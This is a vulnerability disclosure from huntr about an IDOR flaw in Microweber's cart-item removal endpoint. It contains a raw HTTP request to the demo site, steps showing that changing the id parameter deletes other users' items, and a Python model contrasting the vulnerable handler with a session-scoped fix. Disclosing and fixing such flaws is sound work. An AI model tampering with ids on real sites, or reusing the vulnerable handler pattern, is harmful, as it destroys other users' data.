huntr | nithissh200 | 051EC6D4-0B0A-41BF-9DED-27813037C9C9
Feb 18, 2022 - 4:04 p.m.

Business Logic Errors

2022-02-18 16:04:56
nithissh200
www.huntr.dev

EPSS: 0.001 Low (Percentile 21.4%)

Description

I found an IDOR vulnerability where we are able to delete their product from the cart via the id parameter.

Steps to Reproduce:

  • First add any product to the cart and checkout.
  • In the checkout page, we can see the cart details and we also have functionality to delete the product.
  • I gave the request to delete the product from the cart, and the request looks like this:

Request:

POST /demo/api/remove_cart_item HTTP/1.1
Host: demo.microweber.org
Cookie: back_to_admin=https%3A//demo.microweber.org/demo/admin/; csrf-token-data=%7B%22value%22%3A%22ZTtOJvNj4GT9WO1hWUuTH8k51b55vLU8v7IbCauN%22%2C%22expiry%22%3A1645199386777%7D; mw-back-to-live-edit=true; show-sidebar-layouts=0; laravel_session=JfLYa02pKVNp14cHvEsEDfmcEPLtn9EuNGfViPTD; XSRF-TOKEN=ZTtOJvNj4GT9WO1hWUuTH8k51b55vLU8v7IbCauN
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:97.0) Gecko/20100101 Firefox/97.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 6
Origin: https://demo.microweber.org
Referer: https://demo.microweber.org/demo/contact-information
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

id=123

  • As you can see the id parameter; we can assume that the victim’s id is 144. When we change our value to the victim id,
  • the product gets deleted from the victim’s cart.

Impact:

An attacker would be able to delete anybody’s cart product without any user interaction.
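As an added illustration (not Microweber's own code), a minimal model of the remove_cart_item handler: the vulnerable version deletes whatever id it is given, while the hardened version scopes the lookup to the caller's own session, so a foreign id is treated exactly like a missing one. Session names, products and item ids are constructed sample values.

```python
"""Model of the cart-item IDOR in the report above and its fix."""
from dataclasses import dataclass


@dataclass
class CartItem:
    id: int
    session: str   # session (e.g. laravel_session) that owns this cart line
    product: str


class CartStore:
    def __init__(self, items):
        self.items = {item.id: item for item in items}

    # Vulnerable: the item is looked up by id alone, so any authenticated
    # session can remove any other session's cart line (the reported bug).
    def remove_cart_item_vulnerable(self, session, item_id):
        return self.items.pop(item_id, None) is not None

    # Hardened: the lookup is scoped to the caller's own session. A missing
    # id and someone else's id give the same answer, so ids cannot be probed.
    def remove_cart_item_fixed(self, session, item_id):
        item = self.items.get(item_id)
        if item is None or item.session != session:
            return False
        del self.items[item_id]
        return True


def make_store():
    # Constructed sample data: id 123 belongs to the caller, id 144 to another user.
    return CartStore([
        CartItem(123, "attacker-session", "mug"),
        CartItem(144, "victim-session", "book"),
    ])


def demo():
    """Run both handlers against the same data and report what each allows."""
    vuln, fixed = make_store(), make_store()
    return {
        "vuln_deletes_other_users_item": vuln.remove_cart_item_vulnerable("attacker-session", 144),
        "fixed_blocks_other_users_item": fixed.remove_cart_item_fixed("attacker-session", 144),
        "fixed_allows_own_item": fixed.remove_cart_item_fixed("attacker-session", 123),
        "other_users_item_survives": 144 in fixed.items,
    }
```

The same scoping belongs in the database query itself (filter on the session or user column together with the id) rather than as a check after an unscoped fetch.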
